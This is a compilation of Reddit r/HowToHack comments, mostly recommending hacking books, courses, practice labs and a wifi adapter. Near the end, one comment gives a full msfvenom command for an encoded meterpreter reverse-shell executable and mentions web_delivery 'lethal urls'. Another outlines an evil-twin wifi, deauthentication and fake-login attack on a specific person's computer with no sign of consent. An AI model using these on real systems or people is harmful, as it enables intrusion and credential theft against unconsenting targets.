Best products from r/HowToHack

Start here.

Read those left to right. You will learn a lot about networking, a lot about Python and how that is commonly used to hack, and then a lot about Kali Linux. You won't learn how to use the tools, but you will learn what they are.

I would also recommend "Operating System Concepts" but it is a bit pricey. I like that book because it doesn't teach you how to use a bunch of commands in linux, rather it teaches you how operating systems work and why they work that way. Very interesting, and there is an entire section on security. Also, "Penetration Testing" is a good one, and it is cheap too. You will learn how to use some Kali tools, but you'll also learn the important stuff. Buffer overflows and format string attacks are what you need to know how to do. You need to know how to look at and manipulate memory.

If you want to figure out how to do it yourself, read the first four books. If you want a step-by-step guide of exactly what to do, read the last book. It is also pretty important, IMHO, to know a bit about operating systems, but honestly you don't need that one. It just tells you why things are the way they are, which is sometimes helpful when you're like "oh I wonder if I can hack in like this" but then you remember that you could, but they changed it because you could.

Good luck on your endeavors!

Edit: I looked at the sidebar and it agrees with me about learning how OS's work. It says: I think the best place to start is to get a solid understanding of OS concepts first. The combo of Linux, C, and ASM are almost essential to really understanding how everything melts together. I like this resource: http://wiki.osdev.org/Expanded_Main_Page.

I realize this is an old post, but I figured I would add my two cents in:

If you have no Linux Knowledge, I would recommend these two books:
http://www.amazon.com/Introduction-Unix-Linux-John-Muster/dp/0072226951

http://www.amazon.com/Introduction-Linux-Manual-Student-Edition/dp/0072226943/ref=pd_bxgy_b_text_y

I would also recommend getting a book on windows server:
http://www.amazon.com/Mastering-Microsoft-Windows-Server-2008/dp/0470532866

After going over those you should have a fundamental understanding of Unix/Linux

Then I would recommend this if you need to brush up on your basic networking knowlege:

http://www.amazon.com/CompTIA-Network-Deluxe-Recommended-Courseware/dp/111813754X/ref=sr_1_1?s=books&ie=UTF8&qid=1369292584&sr=1-1&keywords=network+%2B+delux+guide

Some security theory wouldn't hurt: I'd recommend these in no particular order:

http://www.amazon.com/The-Basics-Information-Security-Understanding/dp/1597496537/ref=pd_rhf_se_s_cp_7_FHWA

http://www.amazon.com/gp/product/1597496154/ref=s9_simh_se_p14_d0_i6?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=auto-no-results-center-1&pf_rd_r=6289C56ED33B4C108B60&pf_rd_t=301&pf_rd_p=1263465782&pf_rd_i=itia2300

And now we actually start getting into penetration testing:

http://www.amazon.com/Metasploit-The-Penetration-Testers-Guide/dp/159327288X/ref=pd_rhf_se_s_cp_3_FHWA

http://www.amazon.com/The-Basics-Digital-Forensics-Getting/dp/1597496618/ref=pd_rhf_se_s_cp_6_FHWA

http://www.amazon.com/Advanced-Penetration-Testing-Highly-Secured-Environments/dp/1849517746/ref=pd_rhf_se_s_cp_8_FHWA

http://www.amazon.com/Nmap-Network-Scanning-Official-Discovery/dp/0979958717/ref=pd_rhf_se_s_cp_10_FHWA



Full disclosure: I have used all these books in my studies. I am not affiliated in any way with these authors, this also isn't something you can just "master" in 24 hours; you may however learn a few cool tricks early. My advice would be to keep at it, not only read these books, but setup Virtual environments to test these concepts in.

Those books I listed should give you a fundamental understanding of: Linux, Windows server, Networking, Information security theory, computer forensics, and basic penetration testing.

I would also recommend you take up a scripting language, Python is pretty simple to learn if you haven't already, and insanely powerful in the right hands.

Oh, one thing I forgot. NEVER EVER EVER run Kali linux as your primary distribution, setup a duel-boot and use something like Debian as your "casual" computer, and then souly use Kali or backtrack as your "Network security distro"

Ninja edited by myself

Both are wanted m8! Seriously there is no shortage for Cyber Security Professionals, there are too many jobs, and too little people to fill them!

Red Team is a little harder to break into then Blue Team is, due to the wide range of knowledge you need. Red Team is more offensive, so you will be hacking companies (legally) and testing for vulnerabilities, misconfigurations, etc.

Blue Team is more defensive, so you will be working for a company internally - basically preventing cyber attacks, setting up firewalls, managing IDS/IPS, tracking malware, working with SIRT on breaches, doing DFIR and Data Recover, etc.

Since you said you want to break into Red team, then I highly suggest you start with the Security+ (as I posted above) so you can get the basics down.

At the same time start listening to podcasts like Paul's Security Weekly, Down the Security Rabbit Hole, etc. As well as start reading blogs on hacking to get a feel for whats done, get a grasp at security terminology, and just recent news overall.

Get a home lab and learn a few tools like Wireshark and Nmap for basic Cyber Security work - to learn how packets work, how they are structured, and how to scan pc's for ports and services. At the same time, focus on learning about threats and vulnerabilities (which are covered in security+).

If you want to get into PenTesting then you need a wide range of knowledge. Pick up and learn a few languages (master the basics and understand what the code does and how to read/interpret it). You need to know: PHP, HTML, SQL, Python (or Ruby), and a basic language like C, or Java (but this is for more advanced topics like buffer overflows and all)

If you want to dig deeper into PenTesting then start reading: https://www.offensive-security.com/metasploit-unleashed/

The above is a good way to get into the Kali Distro and learn how to run Metasploit against vulnerable VM's.

Take a look at https://www.vulnhub.com/resources/ for books, and vulnerable VM's to practice on.

https://www.cybrary.it/ is also a good place with tons of videos on Ethical Hacking, Post Exploitation, Python for Security, Metasploit, etc.

Pick up some books such as

The Hacker Playbook 2: Practical Guide To Penetration Testing

Hacking: The Art of Exploitation

Black Hat Python: Python Programming for Hackers and Pentesters

Rtfm: Red Team Field Manual

The Hackers Playbook is great resources to get you started and take you step by step on pen testing that will allow you to alter explore the endless possibilities. The Art of Exploitation is also very good, but it's more for exploit writing and buffer overflows (much more advanced topic to save for later!)

Also a good list of resources that you can learn more about security:

Getting Started in Information Security

Pentester Labs

Awesome InfoSec

Awesome Pentest

Learning to hack, with little knowledge of it, will be a journey. You have some background in CS which will definitely help.

Learning to hack, from scratch, is where things become difficult. Where do you start? How do you learn? Luckily there's a vast amount of resources to learn from online.

To start learning is a matter of what you prefer.

Like watching videos/lectures?
https://www.udemy.com/penetration-testing/
https://www.udemy.com/learn-ethical-hacking-from-scratch/

Prefer reading books on the subject?
https://www.amazon.com/Penetration-Testing-Hands-Introduction-Hacking/dp/1593275641
https://www.amazon.com/Basics-Hacking-Penetration-Testing-Second/dp/0124116442

Most universities have Ethical Hacking / Cyber Security courses, can always check there.

I'd recommend learning Python, SSH, and the Linux Terminal in general to get started. But learning how those apply to hacking is a matter of learning and practice.

Hope this helped, and good luck!

I don't know how in depth you want to learn, how in depth determines our recommendations.

1. Do you want to just find out if a site is vulnerable?
   
2. Do you want to learn how attacks work and how the defenses to those attacks work?
   
3. Do you want to get certified in security and make that a huge part of your resume?
   
   You sound like you want the second option.
   
   The key phrase for you is going to be "web application security". That is what security experts (and anyone in this industry) call it.
   
   For web application security there is kind of one master book that covers almost everything, The Web Application Hackers Handbook. I have the book siting right in front of me its about 900 pages and covers just about everything you could ever ask for. Also you'r going to want to get Burp Suite. You can install Kali linux in a VM and it has Burp Suite (recommended) or you can download the free edition for Windows from there website.
   
   Along with the book set up DVWA (there are hundreds of tutorials online on how to do that, hint use XAMPP.) or you can use the paid labs they mention in The Web Application Hackers Handbook. Also visit HackThisSite and other sites that offer web application security practice.
   
   So lets recap:
   
   
4. Buy The Web Application Hackers Handbook.
   
   
5. Setup DVWA.
   
   3.Visit sites that offer web application security challenges.
   
   
   
   By the end of that you should be pretty good at attacking web applications.

It's how I started so I say it's a pretty decent way to start. The most important thing is understanding how the tools work (especially the ones with a GUI) and how they fit together. I suggest reading http://www.amazon.com/gp/aw/d/1597496553/ref=redir_mdp_mobile/192-0648855-7339154 . It's based on BackTrack but there isn't too many discrepancies between the two. It does a wonderful job of teaching what I described above. Good Luck!

Everyone has their own way. I would say start off small and organized, start with something easy and branch off into the more harder stuff. As for me I and how I did it (and I'm still learning btw, it's a never ending process) is to pick up a couple books about "hacking" or penetration testing. I highly recommend this book to start: https://www.amazon.com/Basics-Hacking-Penetration-Testing-Second/dp/0124116442/ref=sr_1_2?ie=UTF8&qid=1483325710&sr=8-2&keywords=basic+to+penetration+testing, it covers the concept of hacking and breaks it down into steps so that a beginner could understand. After I got the concepts, I started to learn Linux (it's kinda a rule of thumb for hackers to know how to use Linux) I learned how the operating system works, the history of it, how to use the terminal, etc. I even completely stop using windows and using entirely Linux for several months.

After that I started to pick up programming languages and I'm still learning them to this day. I would recommend starting out with a scripting language like python and branch out, you don't need to learn it to a point where you become a software engineer, I mean it's a big plus but you don't need to go that hard. Enough where you get familiar with the syntax and know how to create simple programs.

After that I started to use Kali Linux and learned to use the tools and I started to do CTF challenges which I think is the best way to learn is hands on learning and CTFs do just that

good sites:
https://www.hacksplaining.com/
https://www.cybrary.it/
https://www.vulnhub.com/
https://www.hak5.org/
www.securitytube.net/

Python probably not a good choice for a keylogger as you'd need python installed. Suppose fine it you plan on installing it on a linux box.

You would need to gain control of the box first. Metasploit can help you there but I'd say you need to read a couple of beginner security books from Amazon first. This one is pretty good.

http://www.amazon.com/The-Basics-Hacking-Penetration-Testing/dp/1597496553

Okay, first install the lab, add Virtual machines of Windows XP, 7, 2008R2, Linux, different servers like Apache, SQL DB.. then go ahead and scan them, see how different Kali tools work.
I recommend you this book https://www.amazon.com/Hacker-Playbook-Practical-Penetration-Testing/dp/1512214566

Good Luck

Would be great if you could explain what it is you actually want to be learning. Are we talking about hacking webapps? IoT-devices? Network hacking?

I think The Art of Exploitation is a great book. Gives you a good idea of the low level stuffz you would need to know if you wish to break into hacking!

Given your background as a programmer, I would recommend starting with SQL exploits. You need to have at least a working knowledge in how programs and script work, and it gives you the framework for understand how to be clever with the existing code logic and how to think outside the box.

If that ends up being too easy or once you get a good handle on that, take a look at metasploit and the exploit database associated with that. Rather than just using the exploits, look at the code and get an idea of how the individual exploits work (which are all the same on the base level: using logic in a creative way the original programmers didn't think of or intend).

As for books, I recommend This One as a primer. It's not exactly up to date, but the theory is sound (giving you a solid foundation on how exploits are made and the thought process behind them).

I really like This One for learning metasploit and getting a further understanding of exploit scripts.

And I just love This Book in general. Once you take a look, you'll see why.

While there may be cheaper, IMO this is the best bang for your buck. I use it and know others that use it. Works great with Linux, airmon-ng, and wireshark

TP-Link N150 Wireless High Gain USB Adapter (TL-WN722N) https://www.amazon.com/dp/B002SZEOLG/ref=cm_sw_r_cp_apa_0fzozbQ54J4ES

Mess around with various programs and operating systems. Learn to program, learn web development, learn scripting languages, learn databasing basics, learn about how networks and computer hardware works. When you have a basic knowledge of any of these areas, see if you actually like them. If you do, learn more of that area. Start to research more of that field, specifically revolving around security. And read. Seriously, find any book on security and read it. "The Art of Exploitation" is an amazing book with a great live CD full of exercises to get you started.

Network+,Security+,Linux+ = Good.

Udemy i'm not exactly sure about, I have no idea how good it is, however Cybrary does have penetration testing courses on there for free and they're decent.

Grey & Black hat python - Great books. I'm currently looking at black hat python, and it's awesome.

Some other books i'd recommend: Hacking: The Art of Exploitation The hacker playbook 2


While i'm not a professional pentester(YET :P) i've learned alot from the books I listed above as well as the cybrary videos. If you really have the money, I recommend the Penetration Testing With Kali Linux Course From Offensive Security It's fairly expensive, but I've heard it's worth it.

Hi! Saying this as constructively as possible...but I would argue that you do not need Kali to learn about pentesting. In fact, I would go as far as saying to not install Kali until you already know something about pentesting.

If I may recommend some reading material I think that it does a good job of explaining what is going on and the opportunity to write your own scripts and learn some cool (and reusable) stuff along the way.

I just don't think installing Kali anywhere is a great place to really start. I believe you will become a little bit overwhelmed and miss out on what it really means to pentest.

> Advanced pentesting also seems interesting, since it looks like they go over things like buffer overflows and such.

That course is actually following this book, Penetration Testing: A hands on introduction to Hacking. The course author is also the author of the book.

The malware analysis course isn't bad, it gives some good basics information, but Practical Malware Analysis would be a better way of going about it.

This is asked alot, start here. I would recommend starting on simple notepad batch file programs, tutorials on youtube. Once youre done exploring with what that has to offer and think youre ready to move on to more complicated things, its highly debated on what you should start off with; I prefer python, but pick what suits what you want to do best. If you end up going with python and when you are somewhat fluent with it get this book, it helped me a ton. If you want to communicate discretely, look into IRC's, and obviously use a vpn.

I have all these except the CEH (which shouldn't be on this list lol...) and they're all pretty good in their own way. Starting over, I'd go through hacker playbook while reading through the art of exploitation. You'll be pretty rounded at this point, blackhat python and metasploit will be a breeze. Do the ceh one if you're getting a job that wants to see embossed paper. Also, check out Web Application Hacker's Handbook, and Shellcoder's Handbook.

Go through "Hacking: The Art of Exploitation" by Jon Erickson and learn the skills as needed. When you can make it (and I mean not just do the examples, but understand the how and why in each example) through his book you should have some good base knowledge and an idea what subjects you enjoy, pursue them in that order after that.

amazon link to book

edit formating

I have this (https://www.amazon.co.uk/gp/aw/d/B002SZEOLG/ref=mp_s_a_1_1?ie=UTF8&qid=1479103673&sr=8-1&pi=AC_SX280_SY350_FMwebp_QL65&keywords=tp-link+tl-wn722n&dpPl=1&dpID=31VPoK%2B%2BuUL&ref=plSrch) and it works very well! I also have a larger antenna for it (https://www.amazon.co.uk/gp/aw/d/B002VYP5QW/ref=pd_aw_fbt_147_img_2?ie=UTF8&psc=1&refRID=8WZ1A70YFHJRMZXTVT3G) and it nicely increases the range of the adapter. This combo fits your description nicely.

I highly recommend you read this book!. It's a cheap and easy read. It'll help get you thinking in a pentester mind set.

Oh they’re connected to wifi?

I would set up a rouge wifi access point with same SSID and password as the existing one. If you need the password, you can dump it from the computer you have access to. Then you can send a single deauthentication packet to the MAC address for the target computer until it chooses your network (this is not a denial of service as you are forcing his computer to connect through your lab computer, which is still connected to the network)

From there, you can do network captures and control DNS. Do a network capture of port 80 (unecrypted) and DNS requests. He likely has software that automatically checked for software updates over HTTP (VLC does this, among others) every time he starts it.

Alternatively, you can rewrite a DNS request to cause windows to pop up a native windows login window via captive portal (the pop up you see at starbucks wifi)

Documentation here: https://docs.microsoft.com/en-us/windows-hardware/drivers/mobilebroadband/captive-portals#cch

All in all, wifi makes things a lot easier. If you have an atheros/other wireless usb handy you can do all of this in ~15min or less.

Here’s the model I use:
TP-Link 150Mbps High Gain Wireless USB Adapter for PC and Laptops (TL-WN722N) https://www.amazon.com/dp/B002SZEOLG/ref=cm_sw_r_cp_api_i_NC40CbD87F441

It’s $15 and even if you don’t succeed, you’ll never have crappy wifi on campus again. I have 3 in my bag right now.

I see this book recommended a good it: https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470

For the price I think it is a decent resource.

For playing around you can also use https://hack.me - there are a few good challenges on there.

study for CompTIA A+.

They teach you stuff that a normal every-day user wouldn't need to concern themselves with, like OSI layers, types or protocols and standards for data transition. I think it also covers some aspects of security like what hashing is, types of encryption, and gets you used to some tech lingo that an average user may not understand.

After that, go for Network+, it dives deeper into...well, computer networks.

Plenty of free resources for both certifications online. And if you do decide to test for the certifications, they look real gucci on your resume if you have no prior IT experience.

After that, if you have some spare dough, pick up a cheap used laptop for probably $150 or so, and probably pick up one of these guys as well. You don't need any fancy specs. Just enough for you to download Ubuntu and learn linux, setup a challenge for yourself to navigate the operating system using the terminal and the terminal only. That includes installing new programs, opening up files, executing scripts, everything. No double clicking allowed, limit yourself from using the GUI of the OS as much as possible. If you want something done, learn to use the terminal to do it first.

And imo it's really important to do it in that order. Don't be like a lot of people, who thinks buying a laptop and a airmon-ng compatible wifi adapter will make them all set to start becoming a 1337 hacker, and lost interest in a month or two and have basically just wasted their money. Hacking really doesn't have a set course, but if you find yourself with enough interest and discipline to grind through two boring (but very informative) certifications, I believe that then you know you are in the right field. Mostly, you pick up pieces of knowledge here and there, no book is gonna be a fit-all solution towards becoming a hacker. It is the sum of those pieces of knowledge, that makes a hacker a hacker.

I'd recommend checking out The Web Application Hackers Handbook: http://www.amazon.com/The-Web-Application-Hackers-Handbook/dp/1118026470

Its a solid book that covers a lot of what you'd want to know. It does make heavy use of the free BURP suite tool which is a fairly standard tool for web pentesters. It doesn't do everything for you but it helps manual testing.

I've used the TP Link TL-WN722N a lot with good results and have bought a couple of them; however, the price seems to be going up for some reason so I'm not sure if it's as great of a deal.

https://www.amazon.com/TP-Link-N150-Wireless-Adapter-TL-WN722N/dp/B002SZEOLG/ref=sr_1_1?ie=UTF8&qid=1505216714&sr=8-1&keywords=tp+link+tlwn722n

https://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900/ref=sr_1_1?ie=UTF8&qid=1468724554&sr=8-1&keywords=black+hat+python

https://www.amazon.com/Violent-Python-Cookbook-Penetration-Engineers/dp/1597499579/ref=sr_1_1?ie=UTF8&qid=1468724562&sr=8-1&keywords=violent+python

Two good books that will answer what you need. They go over making different tools that can help you in a penetration test.

I think python should be used more to automate things you'd normally do with other tools, not exactly use it to make "hacks".

You'd probably be better off using Ruby with the metasploit framework to actually make exploits, if thats what you mean.

Alfa cards are great for most things you need to do for any kind of wireless hacking. However, not too long ago I ran into a few issues where mine wasn't compatible with some tools I was trying to use. I got this and it worked for me. You just need to do some research and make sure whatever you get is compatible for what you will be doing with it.

1. Code Academy has some free resources for getting started: https://www.codecademy.com/learn/learn-the-command-line Overthewire is also usually recommended. Also, just start using Linux and google solutions as things come up that you don't know how to do. Regarding pentesting methods - There's a lot of resources out there, check the sidebar, but this book lays out the standard methods used: https://www.amazon.com/Penetration-Testing-Hands-Introduction-Hacking/dp/1593275641 (you can probably find it cheaper with a no starch press discount code)
   
2. WSL and python (or just python, but might as well get used to linux at the same time). Also, bash and powershell scripting.
   
3. Yes, the book above isn't free, so like I said, sidebar and such. Ask for it for your birthday, do odd jobs, etc. You don't have to make things expensive, but you're eventually going to have to spend a little bit here and there.
   
4. Anything. Kali is kind of the standard, which is basically Ubuntu Gnome (actually Debian based) with all the tools installed. Windows is good for some tools though, and just to learn the environment since Windows environments are typically the target.
   
   Also, second what /u/BigDaddyXXL said.

This is what I use. Pretty good range and the chipset jives with Linux.

https://www.amazon.com/gp/aw/d/B002SZEOLG/ref=ya_aw_oh_bia_dp?ie=UTF8&psc=1

I found Violent Python a very useful starting point. Particularly when someone else walks through it on video. I particularly find it harder to pick up computer science concepts when I can only read about them rather than follow someone else actually doing and explaining them like in a college course.

https://www.amazon.com/Hacking-Art-Exploitation-Jon-Erickson/dp/1593271441/ref=sr_1_1?ie=UTF8&qid=1510638128&sr=8-1&keywords=hacking+the+art+of+exploitation

This is a very good book overall, but it helps to have a background in Networking.

I’m CompTIA A+ and Network+ certified and finishing a 2 year CS program and Im still learning.

This book is a good starting point, I can't stress enough how important it is to learn the fundementals and mindset before actually learning techniques, this book will teach you the thought process to ask the right questions....

http://www.amazon.com/Hacking-The-Art-Exploitation-Edition/dp/1593271441/ref=sr_1_1?ie=UTF8&qid=1348231729&sr=8-1&keywords=hacking

The Web Application Hackers Handbook is your best bet.


http://www.amazon.com/The-Web-Application-Hackers-Handbook/dp/1118026470


*For your next book purchase

Actually, start with some programming, then move on to "The Art of Exploitation" it's the best book on "hacking" I've ever used...

i like this one. external antenna capable, supports any mode you could need, dirt cheap and prime'able.

http://www.amazon.com/TP-LINK-TL-WN722N-Wireless-Adapter-External/dp/B002SZEOLG

Nmap specifically, I have these three:

• http://www.binarytides.com/nmap-hacking-tutorial-beginners/
  
  
• https://blog.urfix.com/10-cool-nmap-tricks-techniques/
  
  
• https://hackertarget.com/7-nmap-nse-scripts-recon/
  
  For books, I recommend something like Hacking: The Art of Exploitation. This book is famous for being the book about hacking.

Continue to learn python and c outside of school, go into more depth. May not be what your looking for but try reading hacking the art of exploitation and depending on your current knowledge of python violent python may be good for you.

Well you could go read the books on the subject designed to help people build a lab and learn...

http://www.amazon.com/Build-Your-Own-Security-Lab/dp/0470179864

http://www.amazon.com/Penetration-Testing-Hands--Introduction-Hacking/dp/1593275641

Come on man at least credit the author Justin Seitz and give him a chance to sell his works: Black Hat Python: Python Programming for Hackers and Pentesters https://www.amazon.com/dp/1593275900/ref=cm_sw_r_cp_api_WNwIAbYTWGWZH

Edit: seitz not Switzerland

I know the book Hacking: The Art of Exploitation is often referenced as a book to take you from "I have a little experience" to being a little more comfortable with exploiting system vulnerabilities. Don't know if you have read it yet, but maybe it could help. Though this would likely be more for trying to compromise systems at the OS level rather than cracking specific applications, I imagine the same knowledge could be applied to either case.

OWASP Testing Guide

Also check out the Web App Hackers Handbook. This is an extremely handy book to reference to during tests. It would be a good starting point for you to check out.

This book might be a good start.

One option is to just jump in at the deep end. Buy this book - https://www.amazon.com/Penetration-Testing-Hands-Introduction-Hacking/dp/1593275641 and follow along.

You might need to Google a few things you don't understand along the way but YouTube will almost certainly have a few 'explainer' videos for concepts you're not familiar with.

Learn about computer programming, networking and Linux. I recommend this book: Hacking: The art of exploitation

I'd recommend Hacking: The Art of Exploitation.

Yeah, it can get very boring. The best thing I can recommend is to just try it out on your "personal" network.

I don't know how much you know about programming but learn to program, learn Python, C/C++, Java. after this you should be able to pick up any language.

look at this for injecting cookies
http://dustint.com/post/12/cookie-injection-using-greasemonkey

and for learning more hacking try violent python:
https://www.amazon.com/Violent-Python-Cookbook-Penetration-Engineers/dp/1597499579

as with everything find the pdf of it. Its out there.

Google is your friend. So you want to look up tutorials for things like sql injection, XSS, Cross-Site Request Forgery (CSRF).

Here are some attacks you can read:

https://www.owasp.org/index.php/Category:Attack

I'd recommend reading something like Penetration Testing: A Hands-On Introduction To Hacking as it will help you understand not only how to use Metasploit, but the whole lifecycle of a Vulnerability Assessment/Pentest.

The one I use is a TP-LINK TL-WN722N and its $12.25 on amazon

https://www.amazon.com/TP-Link-N150-Wireless-Adapter-TL-WN722N/dp/B002SZEOLG

>I am learning Python


>I want to write a code

https://www.nostarch.com/blackhatpython


https://www.amazon.com/Violent-Python-Cookbook-Penetration-Engineers/dp/1597499579

https://www.humblebundle.com/books/no-starch-hacking-books

http://www.amazon.com/Hacker-Playbook-Practical-Penetration-Testing/dp/1512214566

https://www.amazon.com/Hacking-Art-Exploitation-Jon-Erickson/dp/1593271441

“Hacking: The Art of Exploitation”
https://www.amazon.com/Hacking-Art-Exploitation-Jon-Erickson/dp/1593271441

The intro to the book doesn't get technical.

See here: https://www.amazon.com/Hacking-Art-Exploitation-Jon-Erickson/dp/1593271441#reader_1593271441

On the left side, click Table of Contents, then click Introduction

AoE - Hacking - Art of Exploitation

https://www.amazon.com/Hacking-Art-Exploitation-Jon-Erickson/dp/1593271441

Also AoE comes with a bootable environment (easy enough to VM). So really if you follow the book your asm should be exact. Follow as prescribed until you understand when you can deviate.

https://www.amazon.com/Hacking-Art-Exploitation-Jon-Erickson/dp/1593271441

Buy and read this.

Metasploit: The Penetration Tester's Guide

https://www.amazon.com/dp/159327288X/ref=cm_sw_r_cp_api_Q1CjybJZQEFM1

http://www.nostarch.com/hacking2.htm
http://www.amazon.com/Basics-Hacking-Penetration-Testing-Syngress/dp/1597496553/ref=sr_1_2?ie=UTF8&qid=1422452748&sr=8-2&keywords=pat+engebretson

Get Violent Python this will show you everything that you need in Python for PenTesting.

https://smile.amazon.com/dp/B002SZEOLG/

Another option for you if money is tight, it should be the n150 option. I own this and it works out of the box with kali via live usb and also works in windows10.

Along the same lines, I've very much enjoyed what I've read from Violent Python so far.

http://www.amazon.com/Violent-Python-Cookbook-Penetration-Engineers/dp/1597499579

Came here to say the same thing; you don't NEED Kali to pentest, it's really mostly used because it has a lot of tools already included. You can test from a Windows box if you really wanted to.

Kali won't magically make you a pentester, nor will it teach you how to be one as it's just a bundle of tools - there's no tutorials included with those tools. Read Hackers Playbook 2 and Penetration Testing: A Hands-On Introduction to Hacking and do some vulnerable VM's from places like Vulnhub

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=<port for listener> -f exe -e shinikata_ga_nai -i 9 -o <where you want it saved>

you can use --help-formats for other file formats other than exe. I recommend you do that to get experience.

alternatively, try using the web_delivery module in metasploit to generate lethal urls.

climbs upon soap box this is the problem with Armitage. Raphael is the nicest guy in the world, but putting that gui over the tools took the script out of script kiddie. you're not understanding what's going on under the hood, so you dunno, fundamentally why things are broken.

buy this and read it. you'll be miles ahead of where you are now and you'll see that armitage is only holding you back.